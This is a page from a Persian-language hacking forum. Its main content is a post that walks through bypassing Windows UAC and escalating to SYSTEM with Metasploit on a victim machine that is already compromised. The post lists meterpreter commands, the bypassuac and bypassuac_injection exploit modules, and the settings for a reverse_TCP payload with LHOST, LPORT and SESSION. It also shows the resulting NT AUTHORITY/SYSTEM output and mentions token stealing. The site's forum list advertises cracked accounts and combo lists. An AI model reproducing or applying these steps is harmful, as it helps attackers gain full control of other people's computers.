رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'how bypass uac windows microsoft'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

  1. سلام برای بایپس UAC یکی از بهترین روش ها استفاده از ماژول های built in در متا اسپلویت هست. هنگامی که شما قصد دارید در ونیدوز 7 ,8, 10 ,.. سطح دسنرسی خود را به ' سیستم ' برسانید ممکن است با پیغام خطا موجه شوید . ماژولی که در باره ان صحبت میکنیم در دسته ماژول های محلی local قرار میگیرد یعنی پس از استفاده از یک ماژول remote و گرفتن دسترسی مناسب میتوان از این ماژول استفاده کرد: getuid use priv getsystem دستورات در پوسته meterpreter وارد میشوند. دستور getsystem که همان ماژولی هست که صحبت کردیم به طور حتم در ویندوز های xp و ویندوز سرور ها جوابگوست اما از ویندوز xp به بعد ویژگی جدیدی به نام UAC ظاهر شد که میتوانست از دستکاری های غیر مجاز جلوگیری کند . پس این ماژول در اینگونه ویندوز ها دارای خطاست مگر اینکه قبلا بایپس کرده باشید. ابتدا اطلاعات سطحی از سیستم قربانی میگیریم : run post/windows/gather/win_privs مشاهده میکنید که در قسمت is admin و یا is system کلمه false و در قسمت uac enabled کلمه true نوشته شده. ما از پوسته meterpreter برای مدتی خارج میشویم (منظور بستن نیست) و بعدماژول های بایپس uac را جستجو میکنیم که bypassuac_injection و bypassuac هستند .طریقه کار هر کدام بسته به ویندوز دارد ( 7 یا 8 یا 10) اگر با یکی جواب نگرفتید مطمئنا دومی جوابگوست . ضمنا با خارج شدن از پوسته شماره نشست session را بیاد داشته باشید: background search uac use exploit/windows/local/bypassuac show options در اینجا متغیر هایی که باید مقدار داده شوند نشان داده خواهد شد . set payload windows/meterpreter/reverse_TCP set LHOST IP set LPORT port set SESSION number set TARGET 0 or 1 خب شماره نشست رو که در قسمت مربوطه وارد کنید شماره target هم برای معماری سیستم طرف هست که اونم داخل show options نوشته شده. در نهایت دستور exploit پیلود بایپس در سیستم اپلود و اجرا میشود و از طریق همان پیلود سطح دسترسی سیستمی اکسپلویت (بهره برداری) میشود. و حالا ماژول getsystem برای انجام این عمل : getsystem برای اطمینان ماژول win_priv را دوباره اجرا کنید: run post/windows/gather/win_priv مقدار is admin و is system برابر true و مقدار uac enabled برابر false قرار داده شده. میتوانید ماژول getuid را فرا بخوانید و ببینید که PE به شما داده شده! getuid خروجی : NT AUTHORITY/SYSTEM حال شما ادمین کلاینت هستید . راه دیگر هم هست به اسم steal token که زیاد مناسب ورژن های جدید ویندوز نیست بیشتر در xp استفاده میشه اونم برا نشان جعلیو افزایش سطح دسترسی که راحتتره و اگر getsystem به دلایل نادری جواب نداد از این روش در xp و ویندوز سرور استفاده میشه.
×
×
  • ایجاد مورد جدید...